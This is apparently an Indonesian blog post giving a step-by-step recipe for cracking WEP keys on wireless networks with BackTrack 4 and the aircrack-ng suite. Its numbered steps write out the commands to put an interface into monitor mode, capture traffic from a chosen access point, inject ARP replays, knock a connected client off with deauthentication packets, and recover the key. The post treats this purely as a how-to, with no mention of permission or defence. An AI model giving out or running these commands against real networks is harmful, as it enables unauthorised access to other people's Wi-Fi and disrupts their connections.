Menembus Pertahanan WEP Keys BackTrack 4:
1). Jalankan BackTrack.
2). Reset driver wireless. Ketikkan:
#airmon-ng -> cek interface ath yang aktif
#airmon-ng stop ath0
#airmon-ng stop ath1 -> bila ath1 aktif
#airmon-ng start wifi0
3). Buka 3 buah console.
4). Console 1, ketikkan:
#airodump-ng ath0 -> scanning hotspot yang aktif.
#airodump-ng --channel 11 --bssid 00:0E:2E:C2:2C:0E -w target ath0
Keterangan:
Proses ini untuk mengcapture informasi dapat membantu dalam menembus WE
P Key.
--bssid -> MAC-Address dari AP yang akan di crack
-w target -> hasil capture ini akan disimpan di file yang namanya target
5). Console 2, ketikkan:
Untuk membantu menciptakan pengumpulan paket data
#aireplay-ng --arpreplay -b 00:0E:2E:C2:2C:0E -h 00:0E:2E:C1:1E:83 ath0
Keterangan:
-b -> MAC-Address dari AP.
-h -> MAC-Address dari client yang aktif terhubung ke AP.
6). Console 3, ketikkan:
Untuk mempercepat pengumpulan paket data, dilakukan serangan deauthentication ke client.
#aireplay-ng --deauth 2 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0
Keterangan:
-c -> MAC-Address dari Client
-a -> MAC-Address dari AP
7). Setelah terkumpul paket data yang cukup, dilakukan cracking:
#aircrack-ng target*.cap
Maka dapat kita lihat hasil WEP Key yang berhasil didapatkan.
0 komentar:
Post a Comment